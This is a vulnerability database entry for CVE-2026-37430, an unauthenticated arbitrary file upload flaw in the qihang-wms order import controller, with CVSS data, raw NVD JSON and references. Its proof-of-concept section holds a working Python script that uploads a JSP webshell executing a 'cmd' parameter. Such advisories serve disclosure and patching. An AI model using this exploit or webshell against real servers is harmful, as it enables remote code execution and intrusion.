Security Vulnerability Report
中文
CVE-2026-37430 CVSS 7.3 HIGH

CVE-2026-37430

Published: 2026-05-13 14:17:32
Last Modified: 2026-05-14 20:17:04

Description

An arbitrary file upload vulnerability in the ShopOrderImportController.java component of qihang-wms commit 75c15a allows attackers to execute arbitrary code via uploading a crafted file.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

qihang-wms (commit 75c15a)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target_url = "http://target.com/api/shopOrder/import" # Malicious JSP Webshell content shell_content = '<%@ page import="java.io.*" %><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>' # Prepare the file payload files = { 'file': ('exploit.jsp', shell_content, 'application/octet-stream') } try: # Send the malicious upload request response = requests.post(target_url, files=files, timeout=10) if response.status_code == 200: print("[+] File uploaded successfully.") print("[+] Access the shell at: http://target.com/path/to/exploit.jsp?cmd=whoami") else: print("[-] Upload failed. Status code:", response.status_code) except Exception as e: print("[-] Error occurred:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37430", "sourceIdentifier": "[email protected]", "published": "2026-05-13T14:17:32.453", "lastModified": "2026-05-14T20:17:03.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in the ShopOrderImportController.java component of qihang-wms commit 75c15a allows attackers to execute arbitrary code via uploading a crafted file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef", "source": "[email protected]"}, {"url": "https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/Security%20vulnerability.md", "source": "[email protected]"}, {"url": "https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/Security%20vulnerability.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}